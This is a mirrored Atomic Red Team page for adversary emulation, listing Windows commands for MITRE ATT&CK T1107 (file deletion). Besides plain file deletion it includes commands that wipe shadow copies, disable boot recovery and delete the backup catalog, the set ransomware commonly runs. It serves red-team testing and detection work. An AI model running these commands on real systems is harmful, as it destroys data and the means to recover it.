infosecn1nja
/
atomic-red-team
mirror of https://github.com/infosecn1nja/atomic-red-team.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
atomic-red-team/Windows/Defense_Evasion/File_Deletion.md

473 B
Raw Permalink Blame History

File Deletion

MITRE ATT&CK Technique: T1107

cmd

del /f filename
rmdir example

PowerShell

Remove-Item path c:\testfolder recurse

vssadmin

vssadmin.exe Delete Shadows /All /Quiet

wmic

wmic shadowcopy delete

bcdedit

bcdedit /set {default} bootstatuspolicy ignoreallfailures

bcdedit /set {default} recoveryenabled no

wbadmin

wbadmin delete catalog -quiet